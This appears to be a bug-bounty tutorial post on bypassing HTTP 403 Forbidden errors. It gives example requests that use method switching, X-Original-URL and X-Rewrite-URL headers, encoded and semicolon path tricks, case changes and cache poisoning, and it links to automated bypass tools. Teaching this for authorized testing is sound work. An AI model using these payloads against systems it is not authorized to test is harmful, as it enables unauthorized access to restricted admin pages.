Learn About 403 Bypass
When you don't have authorization to view a webpage or anything else on a web server, you get a 403 Forbidden Error. When you are bug hunting on your target, it frequently happens that you go deep into the target and that you also receive 403 Forbidden or Permission Denied. Most inexperienced users then quit it. However, if you can get beyond it, you can usually see the target's admin page or any other reliable page and conduct searches on it. By reporting it, you can also receive bounty rewards.
I'll walk you through a few manual bypass techniques and also tell you about a Linux utility that can assist you bypass automatically. Now let's get going.
Manually Bypass
Request Method Manipulation: Convert GET request to POST request.
GET /admin HTTP/1.1
Host: target.com
How to apply this
POST /admin HTTP/1.1
Host: target.com
Overriding the Target URL via Non-Standard Headers: X-Original-URL: & X-Rewrite-URL:
GET /admin HTTP/1.1
Host: target.com
How to apply this
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin
Appending %2e after the first slash:
http://target.com/admin => 403
How to apply this
http://target.com/%2e/admin => 200
Try add dot (.) slash (/) and semicolon (;) in the URL:
http://target.com/admin => 403
How to apply this
http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200
Add “..;/” after the directory name:
http://target.com/admin
How to apply this
http://target.com/admin..;/
Try to uppercase the alphabet in the URL:
http://target.com/admin
How to apply this
http://target.com/aDmIN
Via Web Cache Poisoning:
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
Automation Bypass
Here's a list of tools I found for bypassing 40X status codes:
https://github.com/Sn1r/Forbidden-Buster
https://github.com/lobuhi/byp4xx
https://github.com/iamj0ker/bypass-403
https://github.com/gotr00t0day/forbiddenpass
https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122